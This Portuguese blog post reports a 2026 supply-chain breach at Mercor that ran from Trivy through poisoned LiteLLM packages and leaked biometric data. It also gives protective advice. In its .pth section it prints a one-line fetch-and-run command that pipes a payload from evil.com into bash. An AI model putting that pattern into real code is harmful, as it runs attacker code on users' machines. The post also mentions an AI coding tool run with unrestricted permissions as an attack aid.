Sua Voz Foi Roubada: 4TB de Dados Biométricos Vazaram do Mercor

Dados biométricos e segurança digital - breach do Mercor com 4TB de dados vazados

O Hack que Ninguém Viu Acontecendo

Imagina fazer uma entrevista de emprego por vídeo, mostrar seu passaporte na câmera, gravar amostras da sua voz — e descobrir meses depois que tudo isso está num torrent de 4 terabytes no dark web. Foi exatamente o que aconteceu com mais de 40 mil freelancers que trabalhavam para o Mercor, uma das startups de IA mais quentes do Vale do Silício.

No dia 4 de abril de 2026, o grupo de extorsão Lapsus$ publicou um dump massivo contendo gravações de voz em alta qualidade, scans de passaportes, selfies de webcam, currículos com dados pessoais e até código-fonte interno da plataforma. O total? Aproximadamente 4 terabytes de dados — o equivalente a 800 DVDs cheios de informações biométricas impossíveis de “trocar”, como uma senha.

E o pior: a porta de entrada não foi um phishing banal. Foi um ataque de supply chain que começou com uma biblioteca open source que praticamente todo mundo usa.

Mercor: A Startup de $10 Bilhões que Conecta IAs a Humanos

Pra quem não conhece, o Mercor é uma plataforma de recrutamento que conecta trabalhadores humanos a projetos de IA. Empresas como Anthropic, Meta e OpenAI contratam anotadores, revisores e treinadores de modelos por meio do Mercor. É aquela galera que alimenta os datasets, valida respostas e ensina os LLMs a serem menos… estúpidos.

A empresa atingiu uma avaliação de $10 bilhões em 2025 e se posicionou como o elo entre o talento humano e as fábricas de inteligência artificial. Milhares de profissionais — incluindo médicos, advogados e engenheiros — passaram por processos de verificação rigorosos que incluíam gravação de voz, vídeo-entrevista e envio de documentos de identidade.

O problema é que “rigoroso” na verificação de identidade não significou “rigoroso” na proteção desses dados.

A Cadeia de Ataque: Do Trivy ao Mercor

Aqui é onde a história fica técnica — e assustadora. O ataque ao Mercor não começou no Mercor. Começou com uma vulnerabilidade numa ferramenta de segurança chamada Trivy, da Aqua Security.

Etapa 1: Trivy comprometido (19 de março)

O grupo TeamPCP encontrou uma falha na configuração de GitHub Actions do repositório do Trivy. Especificamente, uma misconfiguration no pull_request_target — aquele workflow que roda no contexto do repositório-alvo, não do fork. Com isso, conseguiram fazer force-push de código malicioso em 76 tags de release.

Isso deu acesso a credenciais de CI/CD que estavam nos secrets do repositório.

Etapa 2: LiteLLM envenenado (24 de março)

Com as credenciais roubadas, os atacantes publicaram versões envenenadas da biblioteca LiteLLM no PyPI — especificamente as versões 1.82.7 e 1.82.8. O payload era engenhoso: um arquivo .pth que o interpretador Python executa automaticamente, sem precisar de import explícito.

Já escrevi sobre essa parte do ataque em detalhes. O resumo é: se você rodou pip install litellm naquela janela de tempo, seu ambiente foi comprometido.

Etapa 3: Infiltração no Mercor (24 de março)

O malware instalado via LiteLLM fez exatamente o que foi projetado para fazer:

Coletou chaves SSH e tokens AWS do ambiente
Extraiu secrets do Kubernetes
Implantou containers privilegiados na infraestrutura
Exfiltrou dados via VPN Tailscale para models.litellm[.]cloud

Um detalhe que me chamou atenção nos relatórios: “desenvolvedores estavam rodando Claude com permissões irrestritas de sistema”. Isso facilitou a movimentação lateral dentro da rede. Ironia das ironias — uma ferramenta de IA sendo usada como vetor de ataque dentro de uma empresa de IA.

O Que Exatamente Vazou

Vou ser direto porque os números são importantes:

Categoria	Tamanho	Conteúdo
Registros de candidatos	211 GB	Currículos, SSNs, documentos fiscais, dados de contato
Dados biométricos/KYC	3 TB	Vídeo-entrevistas em HD, scans de passaporte/CNH, dados faciais
Código-fonte	939 GB	Algoritmos, dashboards, chaves de API hardcoded
Dados de rede	—	Mapas de VPN Tailscale, certificados de dispositivos

O mais perigoso está nos 3 terabytes de dados biométricos. Cada perfil de contractor tinha, em média, 2 a 5 minutos de áudio em qualidade de estúdio. Para clonar uma voz com ferramentas disponíveis hoje, você precisa de aproximadamente 15 segundos de áudio limpo.

Lê de novo: 15 segundos é o mínimo. Essas gravações têm 5 minutos. Com passaporte e reconhecimento facial junto.

Por Que Dados Biométricos São Diferentes de Senhas

Quando sua senha vaza, você troca. Quando seu email vaza, você pode trocar (com dor, mas pode). Quando seu número de telefone vaza, você compra outro chip.

Quando sua voz e seu rosto vazam pareados com seu passaporte, não existe “trocar”. Você não pode mudar sua voz. Você não pode mudar seu rosto. E o documento que prova que aquela voz e aquele rosto são seus está no mesmo pacote.

Isso abre possibilidades sombrias:

Clonagem de voz para fraude bancária: muitos bancos usam verificação por voz como segundo fator. Com 5 minutos de áudio limpo, um sistema de voice cloning moderno produz uma réplica quase perfeita.
Deepfakes de vídeo com identidade real: a combinação de vídeo facial + passaporte permite criar identidades sintéticas que passam por verificação KYC em exchanges de criptomoedas, bancos digitais e até processos seletivos remotos.
Engenharia social turbinada: imagine receber uma ligação da voz exata do seu colega de trabalho pedindo credenciais de acesso. É phishing em outro nível.
Extorsão personalizada: o atacante sabe seu nome real, tem sua foto, sabe onde você mora (pelo endereço do passaporte) e pode provar tudo isso.

A Resposta (Ou Falta Dela)

A reação do Mercor foi, na melhor das hipóteses, lenta. A empresa confirmou o breach via Twitter — sim, Twitter — dias após o dump ser publicado. A declaração oficial foi genérica: “estamos investigando o incidente e tomaremos as medidas necessárias”.

As consequências vieram rápido:

Meta pausou indefinidamente todos os contratos com o Mercor
Cinco processos judiciais foram movidos por contractors em menos de 10 dias
Profissionais de alto perfil — médicos e advogados que tinham feito verificação completa — ficaram expostos
A avaliação de $10 bilhões começou a ser questionada por investidores

Nenhuma das big techs que contratavam via Mercor (Anthropic, OpenAI, Meta) se pronunciou publicamente sobre o que estão fazendo para proteger os dados dos contractors que já foram expostos.

Supply Chain: O Calcanhar de Aquiles da IA

Esse breach expõe um problema estrutural que a indústria de IA está varrendo pra debaixo do tapete: a cadeia de suprimentos de software dessas empresas é um castelo de cartas.

Pensa na sequência: uma misconfiguration no GitHub Actions de uma ferramenta de segurança (!) levou ao comprometimento de uma biblioteca Python popular, que levou ao roubo de credenciais internas, que levou ao maior vazamento de dados biométricos da história da IA.

Cada elo dessa cadeia é mantido por equipes relativamente pequenas. O Trivy é open source. O LiteLLM é open source. E o Mercor, apesar de valer $10 bilhões, aparentemente não tinha monitoramento adequado para detectar containers privilegiados sendo deployados na infraestrutura.

O problema do `.pth`

O vetor de ataque via arquivo .pth merece atenção especial. Esses arquivos são executados automaticamente pelo interpretador Python quando ele inicializa. Não precisam ser importados. Não aparecem em nenhum requirements.txt. São praticamente invisíveis para ferramentas de auditoria convencionais.


# Exemplo simplificado de como um .pth malicioso funciona
# Arquivo: malicious.pth (colocado em site-packages/)
import os; os.system("curl -s http://evil.com/payload | bash")

Sim, é simples assim. E é por isso que a comunidade Python tem discutido há anos sobre restringir ou depreciar esse mecanismo.

O Lapsus$ Voltou?

Um ponto que muita gente deixou passar: o Lapsus$ estava supostamente desmantelado. Em 2022, autoridades britânicas prenderam membros do grupo, incluindo adolescentes. O Departamento de Justiça dos EUA indiciou outros. Todo mundo assumiu que o grupo tinha acabado.

Aparentemente, não.

O dump do Mercor foi publicado com a assinatura clássica do Lapsus$: sem ransomware, sem criptografia de dados, sem pedido de resgate tradicional. O modelo deles sempre foi diferente — roubar dados e publicar tudo, às vezes só pelo caos, às vezes para extorsão. O fato de que 4TB apareceram de uma vez sugere que os dados foram exfiltrados ao longo de dias sem detecção.

Isso levanta uma pergunta incômoda: quantas outras empresas foram comprometidas pela mesma cadeia LiteLLM → Trivy e ainda não sabem? O TeamPCP — o grupo que fez o comprometimento inicial — pode ter vendido acesso a múltiplos compradores. O Lapsus$ pode ser apenas o cliente mais barulhento.

Como Saber Se Seus Dados Estão no Dump

Se você trabalhou como contractor para o Mercor em qualquer momento, assuma que seus dados foram comprometidos. Não espere uma notificação oficial. A empresa demorou dias para confirmar o óbvio, e a notificação individual para os afetados? Até o momento em que escrevo, ainda não chegou para a maioria.

Passos práticos:

Ative autenticação por app (TOTP) em todas as contas financeiras — não dependa de SMS ou verificação por voz. Sério, desative verificação por voz em qualquer serviço que ofereça essa opção.
Congele seu crédito nos bureaus de crédito do seu país. No Brasil, o Serasa permite fazer isso gratuitamente.
Monitore tentativas de abertura de conta em seu nome — serviços como Credit Karma (EUA) ou Serasa (Brasil) alertam sobre consultas suspeitas ao seu CPF/SSN.
Desconfie de ligações que pareçam de colegas ou empresas parceiras — se pedirem qualquer dado sensível, desligue e confirme por outro canal. Isso vale especialmente para chamadas que usem sua língua nativa com sotaque perfeito.
Documente tudo — se for vítima de fraude usando seus dados biométricos, o histórico de que você reportou o comprometimento é essencial para disputas legais
Considere um alerta de fraude estendido — nos EUA, você pode colocar um alerta de 7 anos no seu perfil de crédito gratuitamente como vítima de roubo de identidade

As Lições Que a Indústria Precisa Aprender

1. Dados biométricos exigem proteção diferente

Tratar gravações de voz e scans de passaporte com o mesmo nível de segurança de um formulário de cadastro é negligência. Dados biométricos são irrevogáveis. O framework de proteção precisa refletir isso: criptografia end-to-end, acesso zero-trust, retenção mínima e destruição automática após o propósito ser cumprido.

2. Supply chain security não é opcional

A quantidade de empresas bilionárias que rodam pip install direto do PyPI em ambientes de produção sem nenhum tipo de verificação de integridade é alarmante. Soluções existem: pinning de hashes, registries privados com scanning, SBOM (Software Bill of Materials) e assinatura de pacotes.

3. Permissões de ferramentas de IA precisam de limites

O fato de que “desenvolvedores estavam rodando Claude com permissões irrestritas de sistema” deveria ser um escândalo por si só. Ferramentas de IA — por mais úteis que sejam — precisam operar em sandboxes restritas. O princípio do menor privilégio existe por um motivo.

4. Transparência não é opcional

A resposta do Mercor via tweet genérico, sem detalhes técnicos, sem timeline e sem plano de remediação, é o tipo de comunicação que destrói confiança permanentemente. Os 40 mil contractors afetados mereciam melhor.

O Elefante na Sala: Quem Regulamenta Dados Biométricos de Contractors?

O breach do Mercor não é um caso isolado. É o sintoma mais visível de um problema sistêmico: a corrida pela IA criou uma classe inteira de trabalhadores cujos dados biométricos são coletados como commodity, protegidos como planilha de Excel e roubados como se fossem nada.

E aqui entra uma questão legal que poucos estão discutindo. Os contractors do Mercor não são funcionários. São freelancers, muitos em países com pouca ou nenhuma legislação sobre dados biométricos. Um anotador de dados no Quênia tem as mesmas proteções legais que um engenheiro na Califórnia? Obviamente não.

Na Europa, o GDPR já classifica dados biométricos como “categoria especial” com proteções extras — independente do vínculo empregatício. Nos EUA, o cenário é fragmentado. Estados como Illinois (com o BIPA — Biometric Information Privacy Act) têm legislação que pode resultar em multas de $1.000 a $5.000 por violação, por pessoa afetada. Mas a maioria dos estados não tem nada parecido.

Com 40 mil pessoas afetadas e potencial enquadramento no BIPA, as multas teóricas chegam a $200 milhões. O suficiente para fazer qualquer investidor repensar aquela avaliação de $10 bilhões.

A expectativa é que os cinco processos judiciais já em andamento forcem alguma mudança. Mas se a história dos data breaches nos ensinou algo, é que empresas preferem pagar multas a mudar processos. O Facebook pagou $5 bilhões à FTC em 2019 e continuou coletando dados da mesma forma.

Enquanto isso, se você é freelancer na economia de IA, talvez seja hora de questionar quanta informação biométrica você entrega para uma plataforma só porque ela promete acesso a projetos da OpenAI. A voz que você gravou pode já estar sendo usada para treinar o próximo modelo de voice cloning — ou pior, para se passar por você numa ligação para seu banco.

Antes de aceitar o próximo contrato que pede “verificação de identidade completa”, pergunte: onde esses dados ficam armazenados? Por quanto tempo? Quem tem acesso? E o que acontece quando — não se, quando — forem roubados?

Fonte de inspiração: 4TB of voice samples just stolen from 40k AI contractors at Mercor

Shopping cart

Recent Posts

Sua Voz Foi Roubada: 4TB

Microsoft Perdeu a Exclusividade da

Chrome Agora Roda IA no